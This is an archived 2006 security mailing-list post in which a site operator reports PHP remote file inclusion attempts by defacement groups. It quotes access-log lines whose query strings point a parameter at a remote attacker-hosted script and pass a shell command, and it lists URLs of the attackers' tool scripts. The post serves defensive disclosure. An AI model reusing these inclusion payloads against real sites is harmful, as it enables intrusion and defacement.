WebApp Sec mailing list archives
Defacing Groups using PHP Include Attacks as Vector
From: bugtraq () cgisecurity net
Date: Sun, 8 Jan 2006 22:13:05 -0500 (EST)
For the most part I ignore the dozens of daily attacks against my system but this one caught my eye. Looks like some defacing groups are writing/implementing perl scripts to identify query strings, and attempt php inclusion attacks against them (not using known exploits). Below is a log snippet. 202.226.224.67 - - [08/Jan/2006:21:32:43 -0500] "GET / HTTP/1.0" 200 37172 "-" "lwp-trivial/1.35" 202.226.224.67 - - [08/Jan/2006:21:32:44 -0500] "GET /?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 37172 "-" "lwp-trivial/1.35" 202.226.224.67 - - [08/Jan/2006:21:32:45 -0500] "GET /webservers/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 24083 "-" "lwp-triv ial/1.35" 202.226.224.67 - - [08/Jan/2006:21:32:46 -0500] "GET /phishing/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 30626 "-" "lwp-trivia l/1.35" 202.226.224.67 - - [08/Jan/2006:21:32:47 -0500] "GET /database/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 24267 "-" "lwp-trivia l/1.35" 202.226.224.67 - - [08/Jan/2006:21:32:48 -0500] "GET /appservers/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 24521 "-" "lwp-triv ial/1.35" 202.226.224.67 - - [08/Jan/2006:21:32:49 -0500] "GET //lib/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 47471 "-" "lwp-trivial/1. 35" 202.226.224.67 - - [08/Jan/2006:21:32:50 -0500] "GET /archive/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 25445 "-" "lwp-trivial /1.35" 202.226.224.67 - - [08/Jan/2006:21:32:51 -0500] "GET /development/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 24286 "-" "lwp-tri vial/1.35" 202.226.224.67 - - [08/Jan/2006:21:32:52 -0500] "GET /ws/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 29316 "-" "lwp-trivial/1.35 " 202.226.224.67 - - [08/Jan/2006:21:32:53 -0500] "GET //pen-test/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 29892 "-" "lwp-trivi al/1.35" 202.226.224.67 - - [08/Jan/2006:21:32:54 -0500] "GET /ajax/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 28338 "-" "lwp-trivial/1. 35" 202.226.224.67 - - [08/Jan/2006:21:32:55 -0500] "GET /appfirewall/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 24073 "-" "lwp-tri vial/1.35" The script located at www.sanicentrum.be might interest some of you, as well as the include file it uses at http://www.sanicentrum.be/private/therules25.dot and the many scripts it uses/looks for. Working Referenced Links * http://www.sanicentrum.be/private/tool25.dot * http://www.sanicentrum.be/private/writer25.dot * http://www.sanicentrum.be/private/get25.dot * http://www.sanicentrum.be/private/filed25.dot * http://www.sanicentrum.be/private/filed_put25.dot (Of Interest) * http://www.sanicentrum.be/private/copyd25.dot * http://www.sanicentrum.be/private/flist25.dot * http://www.sanicentrum.be/private/style25.dot (Because every defacement group needs html templating :) Non working (at this time) * http://www.sanicentrum.be/private/safe25.dot I've contacted sans since the parent host *appears* to be hacked. - Robert http://www.cgisecurity.com/ Website Security News, and more! http://www.cgisecurity.com/index.rss [RSS Feed] ------------------------------------------------------------------------------- Watchfire's AppScan is the industry's first and leading web application security testing suite, and the only solution to provide comprehensive remediation tasks at every level of the application. See for yourself. Download AppScan 6.0 today. https://www.watchfire.com/securearea/appscansix.aspx?id=701300000003Ssh -------------------------------------------------------------------------------
Current thread:
- Defacing Groups using PHP Include Attacks as Vector bugtraq (Jan 09)